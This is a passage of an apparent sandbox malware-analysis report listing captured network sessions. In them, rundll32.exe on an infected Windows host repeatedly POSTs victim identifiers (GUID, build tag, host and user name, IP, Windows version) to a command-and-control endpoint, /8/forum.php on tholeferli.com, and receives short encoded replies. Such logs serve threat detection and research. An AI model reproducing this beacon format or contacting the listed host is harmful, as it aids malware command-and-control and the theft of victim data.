                                                Host: tholeferli.com
                                                Content-Length: 110
                                                Cache-Control: no-cache
                                                Data Raw: 47 55 49 44 3d 37 35 34 35 33 31 30 32 39 31 33 37 38 38 32 38 35 32 34 26 42 55 49 4c 44 3d 32 32 30 37 5f 78 77 70 69 36 37 26 49 4e 46 4f 3d 39 38 30 31 30 38 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 38 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                                Data Ascii: GUID=7545310291378828524&BUILD=2207_xwpi67&INFO=980108 @ user-PC\user&EXT=&IP=84.17.52.8&TYPE=1&WIN=6.1(x64)
                                                Jul 22, 2021 16:12:26.256982088 CEST476INHTTP/1.1 200 OK
                                                Server: nginx/1.20.1
                                                Date: Thu, 22 Jul 2021 14:12:26 GMT
                                                Content-Type: text/html
                                                Transfer-Encoding: chunked
                                                Connection: keep-alive
                                                X-Powered-By: PHP/5.4.45
                                                Data Raw: 63 0d 0a 43 54 47 58 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                Data Ascii: cCTGXARRABw==0


                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                162192.168.2.2249329194.147.115.7480C:\Windows\SysWOW64\rundll32.exe
                                                TimestampkBytes transferredDirectionData
                                                Jul 22, 2021 16:12:26.538968086 CEST477OUTPOST /8/forum.php HTTP/1.1
                                                Accept: */*
                                                Content-Type: application/x-www-form-urlencoded
                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                Host: tholeferli.com
                                                Content-Length: 110
                                                Cache-Control: no-cache
                                                Data Raw: 47 55 49 44 3d 37 35 34 35 33 31 30 32 39 31 33 37 38 38 32 38 35 32 34 26 42 55 49 4c 44 3d 32 32 30 37 5f 78 77 70 69 36 37 26 49 4e 46 4f 3d 39 38 30 31 30 38 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 38 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                                Data Ascii: GUID=7545310291378828524&BUILD=2207_xwpi67&INFO=980108 @ user-PC\user&EXT=&IP=84.17.52.8&TYPE=1&WIN=6.1(x64)
                                                Jul 22, 2021 16:12:26.707770109 CEST477INHTTP/1.1 200 OK
                                                Server: nginx/1.20.1
                                                Date: Thu, 22 Jul 2021 14:12:26 GMT
                                                Content-Type: text/html
                                                Transfer-Encoding: chunked
                                                Connection: keep-alive
                                                X-Powered-By: PHP/5.4.45
                                                Data Raw: 63 0d 0a 4b 42 59 50 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                Data Ascii: cKBYPARRABw==0


                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                163192.168.2.2249330194.147.115.7480C:\Windows\SysWOW64\rundll32.exe
                                                TimestampkBytes transferredDirectionData
                                                Jul 22, 2021 16:12:26.988025904 CEST478OUTPOST /8/forum.php HTTP/1.1
                                                Accept: */*
                                                Content-Type: application/x-www-form-urlencoded
                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                Host: tholeferli.com
                                                Content-Length: 110
                                                Cache-Control: no-cache
                                                Data Raw: 47 55 49 44 3d 37 35 34 35 33 31 30 32 39 31 33 37 38 38 32 38 35 32 34 26 42 55 49 4c 44 3d 32 32 30 37 5f 78 77 70 69 36 37 26 49 4e 46 4f 3d 39 38 30 31 30 38 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 38 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                                Data Ascii: GUID=7545310291378828524&BUILD=2207_xwpi67&INFO=980108 @ user-PC\user&EXT=&IP=84.17.52.8&TYPE=1&WIN=6.1(x64)
                                                Jul 22, 2021 16:12:27.143672943 CEST478INHTTP/1.1 200 OK
                                                Server: nginx/1.20.1
                                                Date: Thu, 22 Jul 2021 14:12:27 GMT
                                                Content-Type: text/html
                                                Transfer-Encoding: chunked
                                                Connection: keep-alive
                                                X-Powered-By: PHP/5.4.45
                                                Data Raw: 63 0d 0a 54 4e 4d 47 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                Data Ascii: cTNMGARRABw==0


                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                164192.168.2.2249331194.147.115.7480C:\Windows\SysWOW64\rundll32.exe
                                                TimestampkBytes transferredDirectionData
                                                Jul 22, 2021 16:12:27.421057940 CEST479OUTPOST /8/forum.php HTTP/1.1
                                                Accept: */*
                                                Content-Type: application/x-www-form-urlencoded
                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                Host: tholeferli.com
                                                Content-Length: 110
                                                Cache-Control: no-cache
                                                Data Raw: 47 55 49 44 3d 37 35 34 35 33 31 30 32 39 31 33 37 38 38 32 38 35 32 34 26 42 55 49 4c 44 3d 32 32 30 37 5f 78 77 70 69 36 37 26 49 4e 46 4f 3d 39 38 30 31 30 38 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 38 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                                Data Ascii: GUID=7545310291378828524&BUILD=2207_xwpi67&INFO=980108 @ user-PC\user&EXT=&IP=84.17.52.8&TYPE=1&WIN=6.1(x64)
                                                Jul 22, 2021 16:12:27.577605009 CEST479INHTTP/1.1 200 OK
                                                Server: nginx/1.20.1
                                                Date: Thu, 22 Jul 2021 14:12:27 GMT
                                                Content-Type: text/html
                                                Transfer-Encoding: chunked
                                                Connection: keep-alive
                                                X-Powered-By: PHP/5.4.45
                                                Data Raw: 63 0d 0a 4b 56 45 50 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                Data Ascii: cKVEPARRABw==0


                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                165192.168.2.2249332194.147.115.7480C:\Windows\SysWOW64\rundll32.exe
                                                TimestampkBytes transferredDirectionData
                                                Jul 22, 2021 16:12:27.869748116 CEST480OUTPOST /8/forum.php HTTP/1.1
                                                Accept: */*
                                                Content-Type: application/x-www-form-urlencoded
                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                Host: tholeferli.com
                                                Content-Length: 110
                                                Cache-Control: no-cache
                                                Data Raw: 47 55 49 44 3d 37 35 34 35 33 31 30 32 39 31 33 37 38 38 32 38 35 32 34 26 42 55 49 4c 44 3d 32 32 30 37 5f 78 77 70 69 36 37 26 49 4e 46 4f 3d 39 38 30 31 30 38 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 38 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                                Data Ascii: GUID=7545310291378828524&BUILD=2207_xwpi67&INFO=980108 @ user-PC\user&EXT=&IP=84.17.52.8&TYPE=1&WIN=6.1(x64)
                                                Jul 22, 2021 16:12:28.038038969 CEST481INHTTP/1.1 200 OK
                                                Server: nginx/1.20.1
                                                Date: Thu, 22 Jul 2021 14:12:27 GMT
                                                Content-Type: text/html
                                                Transfer-Encoding: chunked
                                                Connection: keep-alive
                                                X-Powered-By: PHP/5.4.45
                                                Data Raw: 63 0d 0a 54 48 53 47 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                Data Ascii: cTHSGARRABw==0


                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                166192.168.2.2249333194.147.115.7480C:\Windows\SysWOW64\rundll32.exe
                                                TimestampkBytes transferredDirectionData
                                                Jul 22, 2021 16:12:28.308907032 CEST481OUTPOST /8/forum.php HTTP/1.1
                                                Accept: */*
                                                Content-Type: application/x-www-form-urlencoded
                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                Host: tholeferli.com
                                                Content-Length: 110
                                                Cache-Control: no-cache
                                                Data Raw: 47 55 49 44 3d 37 35 34 35 33 31 30 32 39 31 33 37 38 38 32 38 35 32 34 26 42 55 49 4c 44 3d 32 32 30 37 5f 78 77 70 69 36 37 26 49 4e 46 4f 3d 39 38 30 31 30 38 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 38 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                                Data Ascii: GUID=7545310291378828524&BUILD=2207_xwpi67&INFO=980108 @ user-PC\user&EXT=&IP=84.17.52.8&TYPE=1&WIN=6.1(x64)
                                                Jul 22, 2021 16:12:28.478202105 CEST482INHTTP/1.1 200 OK
                                                Server: nginx/1.20.1
                                                Date: Thu, 22 Jul 2021 14:12:28 GMT
                                                Content-Type: text/html
                                                Transfer-Encoding: chunked
                                                Connection: keep-alive
                                                X-Powered-By: PHP/5.4.45
                                                Data Raw: 63 0d 0a 41 51 4a 5a 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                Data Ascii: cAQJZARRABw==0


                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                167192.168.2.2249334194.147.115.7480C:\Windows\SysWOW64\rundll32.exe
                                                TimestampkBytes transferredDirectionData
                                                Jul 22, 2021 16:12:28.748070955 CEST482OUTPOST /8/forum.php HTTP/1.1
                                                Accept: */*
                                                Content-Type: application/x-www-form-urlencoded
                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                Host: tholeferli.com
                                                Content-Length: 110
                                                Cache-Control: no-cache
                                                Data Raw: 47 55 49 44 3d 37 35 34 35 33 31 30 32 39 31 33 37 38 38 32 38 35 32 34 26 42 55 49 4c 44 3d 32 32 30 37 5f 78 77 70 69 36 37 26 49 4e 46 4f 3d 39 38 30 31 30 38 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 38 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                                Data Ascii: GUID=7545310291378828524&BUILD=2207_xwpi67&INFO=980108 @ user-PC\user&EXT=&IP=84.17.52.8&TYPE=1&WIN=6.1(x64)
                                                Jul 22, 2021 16:12:28.917356014 CEST483INHTTP/1.1 200 OK
                                                Server: nginx/1.20.1
                                                Date: Thu, 22 Jul 2021 14:12:28 GMT
                                                Content-Type: text/html
                                                Transfer-Encoding: chunked
                                                Connection: keep-alive
                                                X-Powered-By: PHP/5.4.45
                                                Data Raw: 63 0d 0a 47 4d 4e 54 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                Data Ascii: cGMNTARRABw==0


                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                168192.168.2.2249335194.147.115.7480C:\Windows\SysWOW64\rundll32.exe
                                                TimestampkBytes transferredDirectionData
                                                Jul 22, 2021 16:12:29.208460093 CEST484OUTPOST /8/forum.php HTTP/1.1
                                                Accept: */*
                                                Content-Type: application/x-www-form-urlencoded
                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                Host: tholeferli.com
                                                Content-Length: 110
                                                Cache-Control: no-cache
                                                Data Raw: 47 55 49 44 3d 37 35 34 35 33 31 30 32 39 31 33 37 38 38 32 38 35 32 34 26 42 55 49 4c 44 3d 32 32 30 37 5f 78 77 70 69 36 37 26 49 4e 46 4f 3d 39 38 30 31 30 38 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 38 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                                Data Ascii: GUID=7545310291378828524&BUILD=2207_xwpi67&INFO=980108 @ user-PC\user&EXT=&IP=84.17.52.8&TYPE=1&WIN=6.1(x64)
                                                Jul 22, 2021 16:12:29.373975039 CEST484INHTTP/1.1 200 OK
                                                Server: nginx/1.20.1
                                                Date: Thu, 22 Jul 2021 14:12:29 GMT
                                                Content-Type: text/html
                                                Transfer-Encoding: chunked
                                                Connection: keep-alive
                                                X-Powered-By: PHP/5.4.45
                                                Data Raw: 63 0d 0a 47 56 45 54 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                Data Ascii: cGVETARRABw==0


                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                169192.168.2.2249336194.147.115.7480C:\Windows\SysWOW64\rundll32.exe
                                                TimestampkBytes transferredDirectionData
                                                Jul 22, 2021 16:12:29.651611090 CEST485OUTPOST /8/forum.php HTTP/1.1
                                                Accept: */*
                                                Content-Type: application/x-www-form-urlencoded
                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                Host: tholeferli.com
                                                Content-Length: 110
                                                Cache-Control: no-cache
                                                Data Raw: 47 55 49 44 3d 37 35 34 35 33 31 30 32 39 31 33 37 38 38 32 38 35 32 34 26 42 55 49 4c 44 3d 32 32 30 37 5f 78 77 70 69 36 37 26 49 4e 46 4f 3d 39 38 30 31 30 38 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 38 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                                Data Ascii: GUID=7545310291378828524&BUILD=2207_xwpi67&INFO=980108 @ user-PC\user&EXT=&IP=84.17.52.8&TYPE=1&WIN=6.1(x64)
                                                Jul 22, 2021 16:12:29.808022022 CEST485INHTTP/1.1 200 OK
                                                Server: nginx/1.20.1
                                                Date: Thu, 22 Jul 2021 14:12:29 GMT
                                                Content-Type: text/html
                                                Transfer-Encoding: chunked
                                                Connection: keep-alive
                                                X-Powered-By: PHP/5.4.45
                                                Data Raw: 63 0d 0a 51 46 55 4a 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                Data Ascii: cQFUJARRABw==0


                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                17192.168.2.2249184194.147.115.7480C:\Windows\SysWOW64\rundll32.exe
                                                TimestampkBytes transferredDirectionData
                                                Jul 22, 2021 16:11:10.542979002 CEST314OUTPOST /8/forum.php HTTP/1.1
                                                Accept: */*
                                                Content-Type: application/x-www-form-urlencoded
                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                Host: tholeferli.com
                                                Content-Length: 110
                                                Cache-Control: no-cache
                                                Data Raw: 47 55 49 44 3d 37 35 34 35 33 31 30 32 39 31 33 37 38 38 32 38 35 32 34 26 42 55 49 4c 44 3d 32 32 30 37 5f 78 77 70 69 36 37 26 49 4e 46 4f 3d 39 38 30 31 30 38 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 38 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                                Data Ascii: GUID=7545310291378828524&BUILD=2207_xwpi67&INFO=980108 @ user-PC\user&EXT=&IP=84.17.52.8&TYPE=1&WIN=6.1(x64)
                                                Jul 22, 2021 16:11:10.699769020 CEST314INHTTP/1.1 200 OK
                                                Server: nginx/1.20.1
                                                Date: Thu, 22 Jul 2021 14:11:10 GMT
                                                Content-Type: text/html
                                                Transfer-Encoding: chunked
                                                Connection: keep-alive
                                                X-Powered-By: PHP/5.4.45
                                                Data Raw: 63 0d 0a 5a 59 42 41 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                Data Ascii: cZYBAARRABw==0


                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                170192.168.2.2249337194.147.115.7480C:\Windows\SysWOW64\rundll32.exe
                                                TimestampkBytes transferredDirectionData
                                                Jul 22, 2021 16:12:30.087830067 CEST486OUTPOST /8/forum.php HTTP/1.1
                                                Accept: */*
                                                Content-Type: application/x-www-form-urlencoded
                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                Host: tholeferli.com
                                                Content-Length: 110
                                                Cache-Control: no-cache
                                                Data Raw: 47 55 49 44 3d 37 35 34 35 33 31 30 32 39 31 33 37 38 38 32 38 35 32 34 26 42 55 49 4c 44 3d 32 32 30 37 5f 78 77 70 69 36 37 26 49 4e 46 4f 3d 39 38 30 31 30 38 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 38 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                                Data Ascii: GUID=7545310291378828524&BUILD=2207_xwpi67&INFO=980108 @ user-PC\user&EXT=&IP=84.17.52.8&TYPE=1&WIN=6.1(x64)
                                                Jul 22, 2021 16:12:30.242813110 CEST486INHTTP/1.1 200 OK
                                                Server: nginx/1.20.1
                                                Date: Thu, 22 Jul 2021 14:12:30 GMT
                                                Content-Type: text/html
                                                Transfer-Encoding: chunked
                                                Connection: keep-alive
                                                X-Powered-By: PHP/5.4.45
                                                Data Raw: 63 0d 0a 48 4a 51 53 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                Data Ascii: cHJQSARRABw==0


                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                171192.168.2.2249338194.147.115.7480C:\Windows\SysWOW64\rundll32.exe
                                                TimestampkBytes transferredDirectionData
                                                Jul 22, 2021 16:12:30.519759893 CEST487OUTPOST /8/forum.php HTTP/1.1
                                                Accept: */*
                                                Content-Type: application/x-www-form-urlencoded
                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                Host: tholeferli.com
                                                Content-Length: 110
                                                Cache-Control: no-cache
                                                Data Raw: 47 55 49 44 3d 37 35 34 35 33 31 30 32 39 31 33 37 38 38 32 38 35 32 34 26 42 55 49 4c 44 3d 32 32 30 37 5f 78 77 70 69 36 37 26 49 4e 46 4f 3d 39 38 30 31 30 38 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 38 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                                Data Ascii: GUID=7545310291378828524&BUILD=2207_xwpi67&INFO=980108 @ user-PC\user&EXT=&IP=84.17.52.8&TYPE=1&WIN=6.1(x64)
                                                Jul 22, 2021 16:12:30.688602924 CEST487INHTTP/1.1 200 OK
                                                Server: nginx/1.20.1
                                                Date: Thu, 22 Jul 2021 14:12:30 GMT
                                                Content-Type: text/html
                                                Transfer-Encoding: chunked
                                                Connection: keep-alive
                                                X-Powered-By: PHP/5.4.45
                                                Data Raw: 63 0d 0a 43 47 54 58 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                Data Ascii: cCGTXARRABw==0


                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                172192.168.2.2249339194.147.115.7480C:\Windows\SysWOW64\rundll32.exe
                                                TimestampkBytes transferredDirectionData
                                                Jul 22, 2021 16:12:30.951530933 CEST488OUTPOST /8/forum.php HTTP/1.1
                                                Accept: */*
                                                Content-Type: application/x-www-form-urlencoded
                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                Host: tholeferli.com
                                                Content-Length: 110
                                                Cache-Control: no-cache
                                                Data Raw: 47 55 49 44 3d 37 35 34 35 33 31 30 32 39 31 33 37 38 38 32 38 35 32 34 26 42 55 49 4c 44 3d 32 32 30 37 5f 78 77 70 69 36 37 26 49 4e 46 4f 3d 39 38 30 31 30 38 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 38 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                                Data Ascii: GUID=7545310291378828524&BUILD=2207_xwpi67&INFO=980108 @ user-PC\user&EXT=&IP=84.17.52.8&TYPE=1&WIN=6.1(x64)
                                                Jul 22, 2021 16:12:31.118262053 CEST488INHTTP/1.1 200 OK
                                                Server: nginx/1.20.1
                                                Date: Thu, 22 Jul 2021 14:12:30 GMT
                                                Content-Type: text/html
                                                Transfer-Encoding: chunked
                                                Connection: keep-alive
                                                X-Powered-By: PHP/5.4.45
                                                Data Raw: 63 0d 0a 4a 4e 4d 51 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                Data Ascii: cJNMQARRABw==0


                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                173192.168.2.2249340194.147.115.7480C:\Windows\SysWOW64\rundll32.exe
                                                TimestampkBytes transferredDirectionData
                                                Jul 22, 2021 16:12:31.378842115 CEST489OUTPOST /8/forum.php HTTP/1.1
                                                Accept: */*
                                                Content-Type: application/x-www-form-urlencoded
                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                Host: tholeferli.com
                                                Content-Length: 110
                                                Cache-Control: no-cache
                                                Data Raw: 47 55 49 44 3d 37 35 34 35 33 31 30 32 39 31 33 37 38 38 32 38 35 32 34 26 42 55 49 4c 44 3d 32 32 30 37 5f 78 77 70 69 36 37 26 49 4e 46 4f 3d 39 38 30 31 30 38 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 38 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                                Data Ascii: GUID=7545310291378828524&BUILD=2207_xwpi67&INFO=980108 @ user-PC\user&EXT=&IP=84.17.52.8&TYPE=1&WIN=6.1(x64)
                                                Jul 22, 2021 16:12:31.535861015 CEST489INHTTP/1.1 200 OK
                                                Server: nginx/1.20.1
                                                Date: Thu, 22 Jul 2021 14:12:31 GMT
                                                Content-Type: text/html
                                                Transfer-Encoding: chunked
                                                Connection: keep-alive
                                                X-Powered-By: PHP/5.4.45
                                                Data Raw: 63 0d 0a 48 54 47 53 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                Data Ascii: cHTGSARRABw==0


                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                174192.168.2.2249341194.147.115.7480C:\Windows\SysWOW64\rundll32.exe
                                                TimestampkBytes transferredDirectionData
                                                Jul 22, 2021 16:12:31.825335979 CEST490OUTPOST /8/forum.php HTTP/1.1
                                                Accept: */*
                                                Content-Type: application/x-www-form-urlencoded
                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                Host: tholeferli.com
                                                Content-Length: 110
                                                Cache-Control: no-cache
                                                Data Raw: 47 55 49 44 3d 37 35 34 35 33 31 30 32 39 31 33 37 38 38 32 38 35 32 34 26 42 55 49 4c 44 3d 32 32 30 37 5f 78 77 70 69 36 37 26 49 4e 46 4f 3d 39 38 30 31 30 38 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 38 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                                Data Ascii: GUID=7545310291378828524&BUILD=2207_xwpi67&INFO=980108 @ user-PC\user&EXT=&IP=84.17.52.8&TYPE=1&WIN=6.1(x64)
                                                Jul 22, 2021 16:12:31.982024908 CEST491INHTTP/1.1 200 OK
                                                Server: nginx/1.20.1
                                                Date: Thu, 22 Jul 2021 14:12:31 GMT
                                                Content-Type: text/html
                                                Transfer-Encoding: chunked
                                                Connection: keep-alive
                                                X-Powered-By: PHP/5.4.45
                                                Data Raw: 63 0d 0a 46 42 59 55 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                Data Ascii: cFBYUARRABw==0


                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                175192.168.2.2249342194.147.115.7480C:\Windows\SysWOW64\rundll32.exe
                                                TimestampkBytes transferredDirectionData
                                                Jul 22, 2021 16:12:32.249089956 CEST491OUTPOST /8/forum.php HTTP/1.1
                                                Accept: */*
                                                Content-Type: application/x-www-form-urlencoded
                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                Host: tholeferli.com
                                                Content-Length: 110
                                                Cache-Control: no-cache
                                                Data Raw: 47 55 49 44 3d 37 35 34 35 33 31 30 32 39 31 33 37 38 38 32 38 35 32 34 26 42 55 49 4c 44 3d 32 32 30 37 5f 78 77 70 69 36 37 26 49 4e 46 4f 3d 39 38 30 31 30 38 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 38 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                                Data Ascii: GUID=7545310291378828524&BUILD=2207_xwpi67&INFO=980108 @ user-PC\user&EXT=&IP=84.17.52.8&TYPE=1&WIN=6.1(x64)
                                                Jul 22, 2021 16:12:32.406642914 CEST492INHTTP/1.1 200 OK
                                                Server: nginx/1.20.1
                                                Date: Thu, 22 Jul 2021 14:12:32 GMT
                                                Content-Type: text/html
                                                Transfer-Encoding: chunked
                                                Connection: keep-alive
                                                X-Powered-By: PHP/5.4.45
                                                Data Raw: 63 0d 0a 4d 4b 50 4e 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                Data Ascii: cMKPNARRABw==0


                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                176192.168.2.2249343194.147.115.7480C:\Windows\SysWOW64\rundll32.exe
                                                TimestampkBytes transferredDirectionData
                                                Jul 22, 2021 16:12:32.689807892 CEST493OUTPOST /8/forum.php HTTP/1.1
                                                Accept: */*
                                                Content-Type: application/x-www-form-urlencoded
                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                Host: tholeferli.com
                                                Content-Length: 110
                                                Cache-Control: no-cache
                                                Data Raw: 47 55 49 44 3d 37 35 34 35 33 31 30 32 39 31 33 37 38 38 32 38 35 32 34 26 42 55 49 4c 44 3d 32 32 30 37 5f 78 77 70 69 36 37 26 49 4e 46 4f 3d 39 38 30 31 30 38 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 38 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                                Data Ascii: GUID=7545310291378828524&BUILD=2207_xwpi67&INFO=980108 @ user-PC\user&EXT=&IP=84.17.52.8&TYPE=1&WIN=6.1(x64)
                                                Jul 22, 2021 16:12:32.846988916 CEST493INHTTP/1.1 200 OK
                                                Server: nginx/1.20.1
                                                Date: Thu, 22 Jul 2021 14:12:32 GMT
                                                Content-Type: text/html
                                                Transfer-Encoding: chunked
                                                Connection: keep-alive
                                                X-Powered-By: PHP/5.4.45
                                                Data Raw: 63 0d 0a 51 5a 41 4a 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                Data Ascii: cQZAJARRABw==0


                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                177192.168.2.2249344194.147.115.7480C:\Windows\SysWOW64\rundll32.exe
                                                TimestampkBytes transferredDirectionData
                                                Jul 22, 2021 16:12:33.128132105 CEST494OUTPOST /8/forum.php HTTP/1.1
                                                Accept: */*
                                                Content-Type: application/x-www-form-urlencoded
                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                Host: tholeferli.com
                                                Content-Length: 110
                                                Cache-Control: no-cache
                                                Data Raw: 47 55 49 44 3d 37 35 34 35 33 31 30 32 39 31 33 37 38 38 32 38 35 32 34 26 42 55 49 4c 44 3d 32 32 30 37 5f 78 77 70 69 36 37 26 49 4e 46 4f 3d 39 38 30 31 30 38 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 38 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                                Data Ascii: GUID=7545310291378828524&BUILD=2207_xwpi67&INFO=980108 @ user-PC\user&EXT=&IP=84.17.52.8&TYPE=1&WIN=6.1(x64)
                                                Jul 22, 2021 16:12:33.296606064 CEST494INHTTP/1.1 200 OK
                                                Server: nginx/1.20.1
                                                Date: Thu, 22 Jul 2021 14:12:33 GMT
                                                Content-Type: text/html
                                                Transfer-Encoding: chunked
                                                Connection: keep-alive
                                                X-Powered-By: PHP/5.4.45
